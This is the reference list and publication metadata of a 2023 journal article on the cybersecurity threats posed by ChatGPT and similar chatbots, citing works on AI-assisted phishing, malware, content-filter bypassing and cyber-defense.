Cambiaso, E., and Caviglione, L. (2023). Scamming the scammers: using ChatGPT to reply mails for wasting time and resources. arXiv. doi:10.48550/arxiv.2303.13521

Check Point Research (2023). Opwnai: cybercriminals starting to use ChatGPT. Available at: https://research.checkpoint.com/2023/opwnai-cybercriminals-starting-to-use-chatgpt/.

Crothers, E., Japkowicz, N., and Viktor, H. (2023). Machine generated text: a comprehensive survey of threat models and detection methods. arXiv:2210.07321 [cs]. Available at: https://arxiv.org/abs/2210.07321 (Accessed October 13, 2022).

Dash, B., and Sharma, P. (2023). Are ChatGPT and deepfake algorithms endangering the cybersecurity industry? A review. Int. J. Eng. Appl. Sci. (IJEAS) 10 (1). doi:10.31873/IJEAS.10.1.01

Gaur, K. (2023). Is ChatGPT boon or bane for cyber risk management? Available at: https://www.cioandleader.com/article/2023/02/20/chatgpt-boon-or-bane-cyber-risk-management (Accessed June 13, 2023).

Giaretta, A., and Dragoni, N. (2020). Community targeted phishing: a middle ground between massive and spear phishing through Natural Language generation. arXiv:1708.07342 [cs]. Available at: https://arxiv.org/abs/1708.07342 (Accessed August 24, 2017).

Griffith, E. (2023). ChatGPT vs. Google search: in head-to-head battle, which one is smarter? PCMag. Available at: https://www.pcmag.com/news/chatgpt-vs-google-search-in-head-to-head-battle-which-one-is-smarter (Accessed June 13, 2023).

Haleem, A., Javaid, M., and Singh, R. P. (2023). An era of ChatGPT as a significant futuristic support tool: a study on features, abilities, and challenges. BenchCouncil Trans. Benchmarks, Stand. Eval. 2 (4), 100089. doi:10.1016/j.tbench.2023.100089

Hariri, W. (2023). Unlocking the potential of ChatGPT: a comprehensive exploration of its applications, advantages, limitations, and future directions in Natural Language Processing. arXiv:2304.02017 [cs]. Available at: https://arxiv.org/abs/2304.02017 (Accessed March 27, 2023).

Kaminsky, S. (2023). How ChatGPT will change cybersecurity. Available at: https://www.kaspersky.com/blog/chatgpt-cybersecurity/46959/ (Accessed June 13, 2023).

Kamoun, F., Iqbal, F., Esseghir, M. A., and Baker, T. (2020). “AI and machine learning: a mixed blessing for cybersecurity,” in 2020 International Symposium on Networks, Computers and Communications (ISNCC), Montreal, QC, Canada, October 20-22, 2020 (IEEE), 1–7.

Kengly, R. (2023). How to bypass ChatGPT’s content filter: 4 simple ways. wikiHow. Available at: https://www.wikihow.com/Bypass-Chat-Gpt-Filter.

Kirat, D., Jang, J., and Stoecklin, M. (2018). DeepLocker: concealing targeted attacks with AI locksmithing. Available at: https://i.blackhat.com/us-18/Thu-August-9/us-18-Kirat-DeepLocker-Concealing-Targeted-Attacks-with-AI-Locksmithing.pdf.

Koch, C. (2023). I used GPT-3 to find 213 security vulnerabilities in a single codebase. Medium. Available at: https://betterprogramming.pub/i-used-gpt-3-to-find-213-security-vulnerabilities-in-a-single-codebase-cc3870ba9411 (Accessed June 13, 2023).

Kucharavy, A., Schillaci, Z., Maréchal, L., Würsch, M., Dolamic, L., Sabonnadiere, R., et al. (2023). Fundamentals of generative large language models and perspectives in cyber-defense. arXiv. doi:10.48550/arxiv.2303.12132

McKee, F., and Noever, D. (2022a). Chatbots in a botnet world. arXiv:2212.11126 [cs]. Available at: https://arxiv.org/abs/2212.11126 (Accessed December 18, 2022).

McKee, F., and Noever, D. (2022b). Chatbots in a botnet world. Int. J. Cybern. Inf. 12 (2), 77–95. doi:10.5121/ijci.2023.120207

Mijwil, M., Aljanabi, M., and ChatGPT (2023). Towards artificial intelligence-based cybersecurity: the practices and ChatGPT generated ways to combat cybercrime. Iraqi J. Comput. Sci. Math. 4 (1), 65–70. doi:10.52866/ijcsm.2023.01.01.0019

Mulgrew, A. (2023). I built a Zero Day virus with undetectable exfiltration using only ChatGPT prompts. Forcepoint. Available at: https://www.forcepoint.com/blog/x-labs/zero-day-exfiltration-using-chatgpt-prompts.

Nerdy Nav (2023). 91 important ChatGPT statistics & user numbers in April 2023 (GPT-4, plugins update). Available at: https://nerdynav.com/chatgpt-statistics/.

Okunytė, P. (2023). How hackers might be exploiting ChatGPT. CyberNews. Available at: https://cybernews.com/security/hackers-exploit-chatgpt/.

OpenAI (2023). GPT-4 technical report. Available at: https://cdn.openai.com/papers/gpt-4.pdf.

OpenAI (2022). Introducing ChatGPT. Available at: https://openai.com/blog/chatgpt.

Petro, D., and Morris, B. (2017). Weaponizing machine learning: humanity was overrated anyway. Bishop Fox. Available at: https://bishopfox.com/resources/weaponizing-machine-learning-humanity-was-overrated-anyway (Accessed June 13, 2023).

Radford, A., Narasimhan, K., Salimans, T., and Sutskever, I. (2018). Improving language understanding by generative pre-training. Available at: https://www.cs.ubc.ca/~amuham01/LING530/papers/radford2018improving.pdf.

Rodriguez, J. (2023). ChatGPT: a tool for offensive cyber operations?! Not so fast!. Trellix. Available at: https://www.trellix.com/en-us/about/newsroom/stories/research/chatgpt-a-tool-for-offensive-cyber-operations-not-so-fast.html (Accessed June 13, 2023).

Sebastian, G. (2023). Do ChatGPT and other AI chatbots pose a cybersecurity risk? Int. J. Secur. Priv. Pervasive Comput. 15 (1), 1–11. doi:10.4018/ijsppc.320225

Singh, A., and Thaware, V. (2017). Wire me through machine learning. Las Vegas: Black Hat USA. Available at: https://www.blackhat.com/docs/us-17/wednesday/us-17-Singh-Wire-Me-Through-Machine-Learning.pdf.

Song, J., Cho, C., and Won, Y. (2019). Analysis of operating system identification via fingerprinting and machine learning. Comput. Electr. Eng. 78, 1–10. doi:10.1016/j.compeleceng.2019.06.012

Uc-Cetina, V., Navarro-Guerrero, N., Martin-Gonzalez, A., Weber, C., and Wermter, S. (2022). Survey on reinforcement learning for language processing. Artif. Intell. Rev. 56 (2), 1543–1575. doi:10.1007/s10462-022-10205-5

Cisco Umbrella (2021). 2021 cyber security threat trends: phishing, crypto top the list. Available at: https://learn-cloudsecurity.cisco.com/umbrella-library/2021-cyber-security-threat-trends-phishing-crypto-top-the-list#page=1.

Keywords: ChatGPT, AI-powered chatbot, AI-based cyberattacks, AI malware creation, generative AI, cybersecurity threats

Citation: Iqbal F, Samsom F, Kamoun F and MacDermott Á (2023) When ChatGPT goes rogue: exploring the potential cybersecurity threats of AI-powered conversational chatbots. Front. Comms. Net 4:1220243. doi: 10.3389/frcmn.2023.1220243

Received: 10 May 2023; Accepted: 31 July 2023;
Published: 04 September 2023.

Edited by:

Spiridon Bakiras, Singapore Institute of Technology, Singapore

Reviewed by:

Mehran Mozaffari Kermani, University of South Florida, United States
Erald Troja, St. John’s University, United States
Elmahdi Bentafat, Ahmed Bin Mohammed Military College, Qatar

Copyright © 2023 Iqbal, Samsom, Kamoun and MacDermott. This is an open-access article distributed under the terms of the Creative Commons Attribution License (CC BY). The use, distribution or reproduction in other forums is permitted, provided the original author(s) and the copyright owner(s) are credited and that the original publication in this journal is cited, in accordance with accepted academic practice. No use, distribution or reproduction is permitted which does not comply with these terms.

*Correspondence: Farkhund Iqbal, farkhund.iqbal@zu.ac.ae
